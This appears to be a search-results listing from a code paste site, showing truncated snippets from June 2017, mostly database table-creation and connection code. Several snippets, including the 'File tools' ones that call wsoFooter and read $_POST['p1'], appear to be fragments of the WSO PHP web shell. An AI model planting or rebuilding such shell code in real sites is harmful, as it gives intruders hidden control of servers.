42.7K results in 847 ms
9 years ago · Jun 05, 2017, 03:36 AM
function disconnect() { if(self::$con) { mysql_close(self::$con); } } // Create a user into the mysql user table. public static function createUser($user,
9 years ago · Jun 04, 2017, 10:14 PM
Connection conn = DriverManager.getConnection(url,username,password); PreparedStatement create = conn.prepareStatement("CREATE TABLE IF NOT EXISTS stebuklas " + "( first varchar(253), " + "last
9 years ago · Jun 04, 2017, 09:32 PM
Connection con = getConnection (); java.sql.PreparedStatement create = con.prepareStatement("CREATE TABLE IF NOT EXISTS stebuklas " + "( first varchar(253), " + "last
9 years ago · Jun 04, 2017, 08:58 PM
Server thread/TRACE]: compiled statement: CREATE TABLE IF NOT EXISTS `items` (`id` INTEGER PRIMARY
9 years ago · Jun 04, 2017, 04:24 PM
display: none; } </style> ''' output_table += ''' <table cellspacing="2"> ''' if not deck_is_finished: output_table += ''' <tr> <td
9 years ago · Jun 04, 2017, 10:10 AM
UNION=(t1,t2) INSERT_METHOD=LAST;\n','http://dev.mysql.com/doc/refman/5.0/en/merge-storage-engine.html'),(449,'CREATE TABLE',37,'Syntax:\nCREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n (create_definition,...)\n [table_options]\n\nOr:\n\nCREATE [TEMPORARY]
9 years ago · Jun 04, 2017, 09:26 AM
sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1;
9 years ago · Jun 04, 2017, 09:26 AM
sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1;
9 years ago · Jun 03, 2017, 09:58 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jun 03, 2017, 03:40 PM
CREATE DATABASE IF NOT EXISTS `aspichil_evaluacion` /*!40100 DEFAULT CHARACTER
9 years ago · Jun 03, 2017, 09:18 AM
switch ($this->options['type']) { case "zip": if (!$this->create_zip()) { $this->error[] = "Could not create zip file."; return 0;
9 years ago · Jun 03, 2017, 09:12 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jun 03, 2017, 09:06 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jun 03, 2017, 08:38 AM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jun 02, 2017, 07:18 PM
r'Trusted_Connection=red;') cursor = cnxn.cursor() cursor.execute("""if not exists (select * from sysobjects where
9 years ago · Jun 02, 2017, 01:18 PM
password ); mysql_select_db( $database ); /* $sql = "CREATE TABLE IF NOT EXISTS `clients` ( `id` bigint(10) unsigned
9 years ago · Jun 02, 2017, 01:12 PM
password ); mysql_select_db( $database ); /* $sql = "CREATE TABLE IF NOT EXISTS `clients` ( `id` bigint(10) unsigned
9 years ago · Jun 02, 2017, 01:10 PM
password ); mysql_select_db( $database ); /* $sql = "CREATE TABLE IF NOT EXISTS `clients` ( `id` bigint(10) unsigned
9 years ago · Jun 02, 2017, 12:04 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; printFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
9 years ago · Jun 02, 2017, 11:44 AM
sqldumptable($table, $fp=0) { $tabledump = "DROP TABLE IF EXISTS $table;\n"; $tabledump .= "CREATE TABLE $table (\n"; $firstfield=1;
Total pages: 2134